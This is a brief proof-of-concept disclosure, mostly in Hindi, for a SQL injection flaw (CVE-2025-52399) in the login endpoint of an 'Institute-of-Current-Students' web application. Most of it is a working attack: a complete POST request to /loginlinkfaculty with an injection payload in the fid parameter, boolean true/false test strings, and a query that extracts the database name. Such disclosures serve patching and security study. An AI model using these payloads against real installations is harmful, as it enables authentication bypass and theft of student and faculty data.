
CVE-2025-52399 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: Institute-of-Current-Students में fid पैरामीटर के माध्यम से SQL injection, authentication bypass और data extraction सक्षम करना।
Institute-of-Current-Students एप्लिकेशन में loginlinkfaculty एंडपॉइंट fid POST पैरामीटर के माध्यम से SQL इंजेक्शन के प्रति संवेदनशील है। SQL क्वेरी में उपयोग करने से पहले पैरामीटर को ठीक से स्वच्छ नहीं किया जाता, जिससे दूरस्थ हमलावर मनमानी SQL कमांड निष्पादित कर सकते हैं।
/loginlinkfaculty (POST)fidicsnewPOST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
fid=-1'+OR+3*2*1=6+AND+000942=000942--&pass=example
✅ -1' OR 3*2*1=6 AND 000942=000942 -- → सत्य
❌ -1' OR 2*3=4 AND 000942=000942 -- → असत्य
SELECT database(); -- returns 'icsnew'
Isroil Mustafoqulov